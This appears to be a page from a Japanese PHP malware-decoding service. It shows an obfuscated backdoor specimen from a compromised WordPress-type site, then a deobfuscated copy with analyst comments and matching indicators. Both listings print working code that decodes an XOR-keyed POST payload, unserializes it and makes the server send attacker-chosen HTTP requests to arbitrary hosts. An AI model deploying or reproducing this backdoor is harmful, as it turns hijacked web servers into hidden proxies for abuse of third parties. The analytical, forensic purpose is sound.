WordPress などで見つかる PHP のマルウェア・ウイルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。
<?php
/*
 * Obfuscated specimen exactly as submitted to the decoder. Only this comment
 * is added; the code below is unchanged so it can still be matched against
 * files found on a compromised site.
 *
 * Obfuscation layers visible in this listing:
 *   - every string literal is fetched by index from the lookup function
 *     _1111189473(), so no key name, marker or URL part appears inline;
 *   - classes keep readable names (Check, TaskGenerator, Task, TaskExecutor)
 *     but methods and variables are renamed to l__N and $_N;
 *   - small integers are written as round() sums, e.g. round(0+0.5+0.5) is 1,
 *     round(0+3+3+3+3+3) is 15, round(0+25.6+25.6+25.6+25.6+25.6) is 128.
 *
 * What the code does once the indexes are resolved against the table:
 *   - reads $_POST['request_option'] (index 72), base64-decodes it, XORs it
 *     with the repeating key stored at index 14 and passes the result to
 *     unserialize();
 *   - turns the decoded array into cURL requests (method, headers, cookies,
 *     GET/POST data and target URLs all come from that array) and runs them
 *     in parallel with curl_multi;
 *   - serialize()s the responses that matched the supplied substring/regexp
 *     filters and echoes them between the marker strings at indexes 73-76.
 *
 * NOTE(review): nothing in this listing authenticates the caller beyond the
 * payload having to decode and unserialize to a non-empty value, and the key
 * is embedded in the file.
 */
function _1111189473($i){$a=Array('5.3.0',"%%vda8303j9","f3pdosjflnsd890g%%","%%NOGIPfdspFJdf","iPSmnSpojpqwoDPFJP%%","urls","paths","paths","paths","paths","files","files","files","files","fcf01cb6-d298-4251-97e9-1fd0a71558b9","","request","request","GET","headers","headers","post_rawdata","post_rawdata","post_params","post_params","get_params","get_params","cookie_params","cookie_params","math_results","not_substr","math_results","substr","","math_results","substr","math_results","substr","","math_results","regexp","math_results","regexp","","request_timeout","request_timeout","connection_timeout","connection_timeout","return_results","return_results","urls","urls","urls","domains","meta","meta","/\{\{(.*?)\}\}/",": ","Cookie: ","=",";","?",'POST',"domain","url","macros","macros","post_param","post_param","post_param","return_data","return_data",'request_option',"%%%NDOS039","dNDIOF%%%","%%%mfpODPM","EWpo345ODf%%%");return $a[$i];} ?><?php class Check{public static function l__0(){if(isset($_POST['checks'])){$_0=curl_multi_init();if(version_compare(PHP_VERSION,_1111189473(0))<round(0)){echo _1111189473(1) ._1111189473(2);exit();}echo _1111189473(3) ._1111189473(4);exit();}}}class TaskGenerator{private static $_1=array('Accept-Language: en-US,en;q=0.5','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',);private static $_2=Array();private static function l__1($_3){if(empty($_3["urls"])){return Array();}$_3=$_3[_1111189473(5)];if(isset($_3[_1111189473(6)])&&!empty($_3[_1111189473(7)])&& is_array($_3[_1111189473(8)])){$_4=$_3[_1111189473(9)];}else{$_4=Array();}if(isset($_3[_1111189473(10)])&&!empty($_3[_1111189473(11)])&& is_array($_3[_1111189473(12)])){$_5=$_3[_1111189473(13)];}else{$_5=Array();}$_6=Array();if($_4){foreach($_4 as $_7){if($_5){foreach($_5 as $_8){$_6[]=$_7 .$_8;}}else{$_6[]=$_7;}}}else if($_5){foreach($_5 as $_8){$_6[]=$_8;}}return $_6;}public static function 
l__2($_9){$_9=base64_decode($_9);$_10=_1111189473(14);$_11=_1111189473(15);for($_12=0;$_12<strlen($_9);){for($_13=0;$_13<strlen($_10)&& $_12<strlen($_9);$_13++,$_12++){$_11 .= chr(ord($_9[$_12])^ord($_10[$_13]));}}return $_11;}public static function l__3($_9){$_9=TaskGenerator::l__2($_9);$_14=unserialize($_9);return $_14;}public static function l__4($_14){$_15=array();$_16=!empty($_14[_1111189473(16)])?$_14[_1111189473(17)]:_1111189473(18);$_17=!empty($_14[_1111189473(19)])?$_14[_1111189473(20)]:TaskGenerator::$_1;$_18=!empty($_14[_1111189473(21)])?$_14[_1111189473(22)]:NULL;$_19=!empty($_14[_1111189473(23)])?$_14[_1111189473(24)]:Array();$_20=!empty($_14[_1111189473(25)])?$_14[_1111189473(26)]:Array();$_21=!empty($_14[_1111189473(27)])?$_14[_1111189473(28)]:Array();$_22=!empty($_14[_1111189473(29)][_1111189473(30)])?$_14[_1111189473(31)][_1111189473(32)]:_1111189473(33);$_23=!empty($_14[_1111189473(34)][_1111189473(35)])?$_14[_1111189473(36)][_1111189473(37)]:_1111189473(38);$_24=!empty($_14[_1111189473(39)][_1111189473(40)])?$_14[_1111189473(41)][_1111189473(42)]:_1111189473(43);$_25=!empty($_14[_1111189473(44)])?intval($_14[_1111189473(45)]):round(0+3+3+3+3+3);$_26=!empty($_14[_1111189473(46)])?intval($_14[_1111189473(47)]):round(0+2.5+2.5);$_27=!empty($_14[_1111189473(48)])?$_14[_1111189473(49)]:TaskGenerator::$_2;$_28=TaskGenerator::l__1($_14);if(isset($_14[_1111189473(50)])&&!empty($_14[_1111189473(51)])){foreach($_14[_1111189473(52)][_1111189473(53)]as $_29 => $_30){foreach($_28 as $_31){$_32=$_29 .$_31;$_33=new Task();$_33->_16=$_16;$_33->_29=$_29;$_33->_34=$_32;$_33->_25=$_25;$_33->_26=$_26;$_33->_17=$_17;$_33->_18=$_18;$_33->_19=$_19;$_33->_20=$_20;$_33->_21=$_21;$_33->_30=$_30;if(isset($_14[_1111189473(54)]))$_33->_35=$_14[_1111189473(55)];$_33->_22=$_22;$_33->_23=$_23;$_33->_24=$_24;$_33->_27=$_27;$_15[]=$_33;}}}return $_15;}}class Task{public $_16;public $_29;public $_34;public $_17;public $_18;public $_19;public $_20;public $_21;public $_30;public 
$_35;private $_36;public $_23;public $_24;public $_27;public $_25;public $_26;private $_37=NULL;private $_11=Array();private function l__5($_38){$_39="";if(isset($this->_36[$_38])){return $this->_36[$_38];}if(!empty($this->_30[$_38])){$_40=array_rand($this->_30[$_38]);$_39=$this->_30[$_38][$_40];$this->_36[$_38]=$_39;unset($this->_30[$_38][$_40]);}else if(!empty($this->_35[$_38])){$_40=array_rand($this->_35[$_38]);$_39=$this->_35[$_38][$_40];$this->_36[$_38]=$_39;unset($this->_35[$_38][$_40]);}return $_39;}private function l__6($_9){if(is_array($_9)){$_41=Array();$_42=array_keys($_9);foreach($_42 as $_10){$_43=$this->l__6($_10);$_44=$this->l__6($_9[$_10]);$_41[$_43]=$_44;}return $_41;}else if(is_string($_9)){preg_match_all(_1111189473(56),$_9,$_45);for($_12=round(0);$_12<sizeof($_45[round(0)]);$_12++){$_46=$_45[round(0)][$_12];$_38=$_45[round(0+0.5+0.5)][$_12];$_47=$this->l__5($_38);$_9=str_replace($_46,$_47,$_9);}return $_9;}else{return $_9;}}private function l__7(){$_41=Array();$_17=$this->l__6($this->_17);$_21=$this->l__6($this->_21);foreach($_17 as $_10=>$_48){$_41[]=$_10 ._1111189473(57) .$_48;}$_49=_1111189473(58);foreach($_21 as $_10=>$_48){$_49 .= $_10 ._1111189473(59) .$_48 ._1111189473(60);}$_41[]=$_49;return $_41;}public function l__8(){if(!empty($this->_37)){return $this->_37;}if(!empty($this->_20)){$_34=$this->_34 ._1111189473(61) 
.http_build_query($this->l__6($this->_20));}else{$_34=$this->_34;}$_37=curl_init($_34);curl_setopt($_37,CURLOPT_RETURNTRANSFER,true);curl_setopt($_37,CURLOPT_CONNECTTIMEOUT,$this->_26);curl_setopt($_37,CURLOPT_TIMEOUT,$this->_25);curl_setopt($_37,CURLINFO_HEADER_OUT,true);curl_setopt($_37,CURLOPT_HEADER,round(0+0.25+0.25+0.25+0.25));curl_setopt($_37,CURLOPT_VERBOSE,round(0+0.25+0.25+0.25+0.25));curl_setopt($_37,CURLOPT_FOLLOWLOCATION,round(0+0.5+0.5));curl_setopt($_37,CURLOPT_CUSTOMREQUEST,$this->_16);if($this->_17){curl_setopt($_37,CURLOPT_HTTPHEADER,$this->l__7());}if(!empty($this->_19)||!empty($this->_18)){if(!empty($this->_18)){curl_setopt($_37,CURLOPT_POSTFIELDS,$this->l__6($this->_18));}else{curl_setopt($_37,CURLOPT_POSTFIELDS,http_build_query($this->l__6($this->_19)));}curl_setopt($_37,CURLOPT_POST,round(0+0.5+0.5));curl_setopt($_37,CURLOPT_CUSTOMREQUEST,_1111189473(62));}curl_setopt($_37,CURLOPT_BUFFERSIZE,round(0+25.6+25.6+25.6+25.6+25.6));curl_setopt($_37,CURLOPT_NOPROGRESS,false);$this->_37=$_37;return $_37;}public function l__9($_11){$_50=FALSE;if(!empty($this->_23)){if(strpos($_11,$this->_23)!== FALSE){$_50=TRUE;}}if(!empty($this->_24)){if(preg_match($this->_24,$_11)){$_50=TRUE;}}if(!empty($this->_22)){if(strpos($_11,$this->_22)!== FALSE){$_50=FALSE;}}if($_50){$this->_11[_1111189473(63)]=$this->_29;$this->_11[_1111189473(64)]=$this->_34;if(in_array(_1111189473(65),$this->_27)){$this->_11[_1111189473(66)]=$this->_36;}if(in_array(_1111189473(67),$this->_27)){if(!empty($this->_18)){$this->_11[_1111189473(68)]=$this->_18;}else{$this->_11[_1111189473(69)]=$this->_19;}}if(in_array(_1111189473(70),$this->_27)){$this->_11[_1111189473(71)]=$_11;}}return $this->_11;}public function l__10(){return $this->_11;}}class TaskExecutor{public static function l__11($_15,$_51){$_0=curl_multi_init();foreach($_15 as $_33){curl_multi_add_handle($_0,$_33->l__8());}$_52=NULL;do{curl_multi_exec($_0,$_52);}while($_52>round(0));foreach($_15 as 
$_33){$_33->l__9(curl_multi_getcontent($_33->l__8()));curl_multi_remove_handle($_0,$_33->l__8());}curl_multi_close($_0);return $_15;}}$_53=TaskGenerator::l__3($_POST[_1111189473(72)]);;if(!$_53){exit();}$_15=TaskGenerator::l__4($_53);$_15=TaskExecutor::l__11($_15,-round(0+0.25+0.25+0.25+0.25));$_54=Array();foreach($_15 as $_33){$_11=$_33->l__10();if(!empty($_11)){$_54[]=$_11;}}echo _1111189473(73) ._1111189473(74) .serialize($_54) ._1111189473(75) ._1111189473(76) .PHP_EOL;
<?php
/*
 * Decoder output for the specimen above: the same program, reformatted, with
 * most round() sums folded to a single value (round(15), round(5.0),
 * round(1.0), round(128.0)). Method and variable names are still the
 * obfuscated l__N / $_N ones, and strings are still resolved through
 * _1111189473(index). The comments below resolve those indexes against the
 * table so the listing can be read straight through.
 *
 * Behaviour shown by this listing:
 *   1. Input: $_POST['request_option'] is base64-decoded, XORed with the
 *      repeating key at index 14 and passed to unserialize(). If the result
 *      is empty or false the script exits without output.
 *   2. The decoded array supplies the HTTP method ('request', default GET),
 *      'headers', 'post_rawdata', 'post_params', 'get_params',
 *      'cookie_params', the timeouts, response filters under 'math_results'
 *      (key spelled that way in the table), and the targets under
 *      'urls' => 'domains' / 'paths' / 'files'.
 *   3. One Task, and so one cURL handle, is built per domain and path
 *      combination; all handles run in parallel through curl_multi.
 *   4. Each response is tested against the filters; hits are collected,
 *      serialize()d and echoed between the marker strings at indexes 73-76.
 *
 * In other words, the file lets whoever can build a valid payload make the
 * web server send HTTP requests of their choosing to hosts of their choosing
 * and read back selected responses. Nothing in the listing authenticates the
 * caller beyond the payload having to decode with the embedded key.
 *
 * Strings on this page that an investigator can match in files or traffic:
 * the POST field names 'request_option' and 'checks', the XOR key at index
 * 14, and the four marker pairs at indexes 1-4 and 73-76.
 * NOTE(review): sustained outbound HTTP from the web server process to
 * unrelated hosts would be the network-side symptom to look for; that is an
 * inference from the code, not something the page states.
 */
/* String table: returns the literal stored at position $i. */
function _1111189473($i) { $a = array('5.3.0', "%%vda8303j9", "f3pdosjflnsd890g%%", "%%NOGIPfdspFJdf", "iPSmnSpojpqwoDPFJP%%", "urls", "paths", "paths", "paths", "paths", "files", "files", "files", "files", "fcf01cb6-d298-4251-97e9-1fd0a71558b9", "", "request", "request", "GET", "headers", "headers", "post_rawdata", "post_rawdata", "post_params", "post_params", "get_params", "get_params", "cookie_params", "cookie_params", "math_results", "not_substr", "math_results", "substr", "", "math_results", "substr", "math_results", "substr", "", "math_results", "regexp", "math_results", "regexp", "", "request_timeout", "request_timeout", "connection_timeout", "connection_timeout", "return_results", "return_results", "urls", "urls", "urls", "domains", "meta", "meta", "/\\{\\{(.*?)\\}\\}/", ": ", "Cookie: ", "=", ";", "?", 'POST', "domain", "url", "macros", "macros", "post_param", "post_param", "post_param", "return_data", "return_data", 'request_option', "%%%NDOS039", "dNDIOF%%%", "%%%mfpODPM", "EWpo345ODf%%%"); return $a[$i]; }
/*
 * Check::l__0(): when the POST field 'checks' is present, calls
 * curl_multi_init(), then prints the marker pair at indexes 1-2 if
 * PHP_VERSION is below 5.3.0, otherwise the pair at indexes 3-4, and exits.
 * It is not called anywhere in this listing.
 * NOTE(review): looks like a capability probe for the operator - confirm
 * against the full file.
 */
class Check { public static function l__0() { if (isset($_POST['checks'])) { $_0 = curl_multi_init(); if (version_compare(PHP_VERSION, _1111189473(0)) < round(0)) { echo _1111189473(1) . _1111189473(2); exit; } echo _1111189473(3) . 
_1111189473(4); exit; } } }
/*
 * TaskGenerator
 *   $_1    default header list used when the payload has no 'headers'.
 *   $_2    default (empty) list for 'return_results'.
 *   l__1   builds the list of URL suffixes from payload['urls']['paths'] and
 *          ['files']: every path joined with every file, or whichever of the
 *          two lists is present.
 *   l__2   base64-decodes its argument and XORs it byte by byte with the
 *          repeating key from index 14.
 *   l__3   l__2 followed by unserialize() on the result. The input is request
 *          data, so this is unserialize() on data controlled by the sender.
 *   l__4   reads the request settings from the decoded array and creates one
 *          Task per key of payload['urls']['domains'] and suffix from l__1;
 *          the target URL is the domain key concatenated with the suffix, and
 *          the value under each domain key is kept as that task's
 *          placeholder pool ($_30), with payload['meta'] as fallback ($_35).
 *          Timeouts default to 15 s total and 5 s connect.
 *          Note the negative filter $_22 is read from
 *          ['math_results']['substr'] although the presence test is on
 *          ['math_results']['not_substr'] (indexes 29-32).
 */
class TaskGenerator { private static $_1 = array('Accept-Language: en-US,en;q=0.5', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'); private static $_2 = array(); private static function l__1($_3) { if (empty($_3["urls"])) { return array(); } $_3 = $_3[_1111189473(5)]; if (isset($_3[_1111189473(6)]) && !empty($_3[_1111189473(7)]) && is_array($_3[_1111189473(8)])) { $_4 = $_3[_1111189473(9)]; } else { $_4 = array(); } if (isset($_3[_1111189473(10)]) && !empty($_3[_1111189473(11)]) && is_array($_3[_1111189473(12)])) { $_5 = $_3[_1111189473(13)]; } else { $_5 = array(); } $_6 = array(); if ($_4) { foreach ($_4 as $_7) { if ($_5) { foreach ($_5 as $_8) { $_6[] = $_7 . $_8; } } else { $_6[] = $_7; } } } else { if ($_5) { foreach ($_5 as $_8) { $_6[] = $_8; } } } return $_6; } public static function l__2($_9) { $_9 = base64_decode($_9); $_10 = _1111189473(14); $_11 = _1111189473(15); for ($_12 = 0; $_12 < strlen($_9);) { for ($_13 = 0; $_13 < strlen($_10) && $_12 < strlen($_9); $_13++, $_12++) { $_11 .= chr(ord($_9[$_12]) ^ ord($_10[$_13])); } } return $_11; } public static function l__3($_9) { $_9 = TaskGenerator::l__2($_9); $_14 = unserialize($_9); return $_14; } public static function l__4($_14) { $_15 = array(); $_16 = !empty($_14[_1111189473(16)]) ? $_14[_1111189473(17)] : _1111189473(18); $_17 = !empty($_14[_1111189473(19)]) ? $_14[_1111189473(20)] : TaskGenerator::$_1; $_18 = !empty($_14[_1111189473(21)]) ? $_14[_1111189473(22)] : NULL; $_19 = !empty($_14[_1111189473(23)]) ? $_14[_1111189473(24)] : array(); $_20 = !empty($_14[_1111189473(25)]) ? $_14[_1111189473(26)] : array(); $_21 = !empty($_14[_1111189473(27)]) ? $_14[_1111189473(28)] : array(); $_22 = !empty($_14[_1111189473(29)][_1111189473(30)]) ? $_14[_1111189473(31)][_1111189473(32)] : _1111189473(33); $_23 = !empty($_14[_1111189473(34)][_1111189473(35)]) ? 
$_14[_1111189473(36)][_1111189473(37)] : _1111189473(38); $_24 = !empty($_14[_1111189473(39)][_1111189473(40)]) ? $_14[_1111189473(41)][_1111189473(42)] : _1111189473(43); $_25 = !empty($_14[_1111189473(44)]) ? intval($_14[_1111189473(45)]) : round(15); $_26 = !empty($_14[_1111189473(46)]) ? intval($_14[_1111189473(47)]) : round(5.0); $_27 = !empty($_14[_1111189473(48)]) ? $_14[_1111189473(49)] : TaskGenerator::$_2; $_28 = TaskGenerator::l__1($_14); if (isset($_14[_1111189473(50)]) && !empty($_14[_1111189473(51)])) { foreach ($_14[_1111189473(52)][_1111189473(53)] as $_29 => $_30) { foreach ($_28 as $_31) { $_32 = $_29 . $_31; $_33 = new Task(); $_33->_16 = $_16; $_33->_29 = $_29; $_33->_34 = $_32; $_33->_25 = $_25; $_33->_26 = $_26; $_33->_17 = $_17; $_33->_18 = $_18; $_33->_19 = $_19; $_33->_20 = $_20; $_33->_21 = $_21; $_33->_30 = $_30; if (isset($_14[_1111189473(54)])) { $_33->_35 = $_14[_1111189473(55)]; } $_33->_22 = $_22; $_33->_23 = $_23; $_33->_24 = $_24; $_33->_27 = $_27; $_15[] = $_33; } } } return $_15; } }
/*
 * Task: one outbound request and its result.
 *   Properties set by TaskGenerator::l__4: $_16 method, $_29 domain key,
 *   $_34 full URL, $_17 headers, $_18 raw POST body, $_19 POST params,
 *   $_20 GET params, $_21 cookies, $_30 / $_35 placeholder pools,
 *   $_22 / $_23 / $_24 response filters, $_27 list of extra fields to
 *   return, $_25 / $_26 timeouts. $_36 caches chosen placeholder values,
 *   $_37 the cURL handle, $_11 the result array.
 *   l__5   returns the value for a placeholder name: the cached one if any,
 *          else a random entry taken (and removed) from $_30[name], else
 *          from $_35[name], else the empty string.
 *   l__6   recursively replaces every {{name}} occurrence (pattern at index
 *          56) in a string, or in the keys and values of an array, with the
 *          value from l__5; other types are returned unchanged.
 *   l__7   builds the header lines as "key: value" plus one "Cookie: " line
 *          made from the cookie array.
 *   l__8   creates the cURL handle on first call and returns it afterwards.
 *          GET params are appended after "?". Redirects are followed,
 *          response headers are included in the returned content, and the
 *          method is forced to POST when a raw body or POST params exist.
 *   l__9   marks the response as a hit if it contains $_23 or matches the
 *          regexp $_24, and clears the hit if it contains $_22; on a hit it
 *          stores 'domain' and 'url', plus 'macros', 'post_param' and
 *          'return_data' (the response itself) when those names are listed
 *          in $_27. The regexp passed to preg_match() comes from the payload.
 *   l__10  returns the stored result array.
 */
class Task { public $_16; public $_29; public $_34; public $_17; public $_18; public $_19; public $_20; public $_21; public $_30; public $_35; private $_36; public $_23; public $_24; public $_27; public $_25; public $_26; private $_37 = NULL; private $_11 = array(); private function l__5($_38) { $_39 = ""; if (isset($this->_36[$_38])) { return $this->_36[$_38]; } if (!empty($this->_30[$_38])) { $_40 = array_rand($this->_30[$_38]); $_39 = $this->_30[$_38][$_40]; $this->_36[$_38] = $_39; unset($this->_30[$_38][$_40]); } else { if (!empty($this->_35[$_38])) { $_40 = array_rand($this->_35[$_38]); $_39 = $this->_35[$_38][$_40]; $this->_36[$_38] = $_39; unset($this->_35[$_38][$_40]); } } return $_39; } private function l__6($_9) { if (is_array($_9)) { $_41 = array(); $_42 = array_keys($_9); foreach ($_42 as $_10) { $_43 = $this->l__6($_10); $_44 = $this->l__6($_9[$_10]); $_41[$_43] = $_44; } return $_41; } else { if (is_string($_9)) { 
preg_match_all(_1111189473(56), $_9, $_45); for ($_12 = round(0); $_12 < sizeof($_45[round(0)]); $_12++) { $_46 = $_45[round(0)][$_12]; $_38 = $_45[round(1.0)][$_12]; $_47 = $this->l__5($_38); $_9 = str_replace($_46, $_47, $_9); } return $_9; } else { return $_9; } } } private function l__7() { $_41 = array(); $_17 = $this->l__6($this->_17); $_21 = $this->l__6($this->_21); foreach ($_17 as $_10 => $_48) { $_41[] = $_10 . _1111189473(57) . $_48; } $_49 = _1111189473(58); foreach ($_21 as $_10 => $_48) { $_49 .= $_10 . _1111189473(59) . $_48 . _1111189473(60); } $_41[] = $_49; return $_41; } public function l__8() { if (!empty($this->_37)) { return $this->_37; } if (!empty($this->_20)) { $_34 = $this->_34 . _1111189473(61) . http_build_query($this->l__6($this->_20)); } else { $_34 = $this->_34; } $_37 = curl_init($_34); curl_setopt($_37, CURLOPT_RETURNTRANSFER, true); curl_setopt($_37, CURLOPT_CONNECTTIMEOUT, $this->_26); curl_setopt($_37, CURLOPT_TIMEOUT, $this->_25); curl_setopt($_37, CURLINFO_HEADER_OUT, true); curl_setopt($_37, CURLOPT_HEADER, round(1.0)); curl_setopt($_37, CURLOPT_VERBOSE, round(1.0)); curl_setopt($_37, CURLOPT_FOLLOWLOCATION, round(1.0)); curl_setopt($_37, CURLOPT_CUSTOMREQUEST, $this->_16); if ($this->_17) { curl_setopt($_37, CURLOPT_HTTPHEADER, $this->l__7()); } if (!empty($this->_19) || !empty($this->_18)) { if (!empty($this->_18)) { curl_setopt($_37, CURLOPT_POSTFIELDS, $this->l__6($this->_18)); } else { curl_setopt($_37, CURLOPT_POSTFIELDS, http_build_query($this->l__6($this->_19))); } curl_setopt($_37, CURLOPT_POST, round(1.0)); curl_setopt($_37, CURLOPT_CUSTOMREQUEST, _1111189473(62)); } curl_setopt($_37, CURLOPT_BUFFERSIZE, round(128.0)); curl_setopt($_37, CURLOPT_NOPROGRESS, false); $this->_37 = $_37; return $_37; } public function l__9($_11) { $_50 = FALSE; if (!empty($this->_23)) { if (strpos($_11, $this->_23) !== FALSE) { $_50 = TRUE; } } if (!empty($this->_24)) { if (preg_match($this->_24, $_11)) { $_50 = TRUE; } } if 
(!empty($this->_22)) { if (strpos($_11, $this->_22) !== FALSE) { $_50 = FALSE; } } if ($_50) { $this->_11[_1111189473(63)] = $this->_29; $this->_11[_1111189473(64)] = $this->_34; if (in_array(_1111189473(65), $this->_27)) { $this->_11[_1111189473(66)] = $this->_36; } if (in_array(_1111189473(67), $this->_27)) { if (!empty($this->_18)) { $this->_11[_1111189473(68)] = $this->_18; } else { $this->_11[_1111189473(69)] = $this->_19; } } if (in_array(_1111189473(70), $this->_27)) { $this->_11[_1111189473(71)] = $_11; } } return $this->_11; } public function l__10() { return $this->_11; }
/* End of class Task. */
}
/*
 * TaskExecutor::l__11(): adds every task's cURL handle to one curl_multi
 * handle, calls curl_multi_exec() in a loop until no transfer is still
 * running, then hands each response to Task::l__9() and releases the
 * handles. The loop has no curl_multi_select() call between iterations.
 * The second parameter ($_51) is not used in the body.
 */
class TaskExecutor { public static function l__11($_15, $_51) { $_0 = curl_multi_init(); foreach ($_15 as $_33) { curl_multi_add_handle($_0, $_33->l__8()); } $_52 = NULL; do { curl_multi_exec($_0, $_52); } while ($_52 > round(0)); foreach ($_15 as $_33) { $_33->l__9(curl_multi_getcontent($_33->l__8())); curl_multi_remove_handle($_0, $_33->l__8()); } curl_multi_close($_0); return $_15; } }
/*
 * Entry point, runs on every request to the file: decode
 * $_POST['request_option'], exit silently if that yields nothing, build and
 * run the tasks, then print the non-empty results as
 * "%%%NDOS039" "dNDIOF%%%" serialize(results) "%%%mfpODPM" "EWpo345ODf%%%"
 * followed by PHP_EOL.
 */
$_53 = TaskGenerator::l__3($_POST[_1111189473(72)]); if (!$_53) { exit; } $_15 = TaskGenerator::l__4($_53); $_15 = TaskExecutor::l__11($_15, -round(1.0)); $_54 = array(); foreach ($_15 as $_33) { $_11 = $_33->l__10(); if (!empty($_11)) { $_54[] = $_11; } } echo _1111189473(73) . _1111189473(74) . serialize($_54) . _1111189473(75) . _1111189473(76) . PHP_EOL;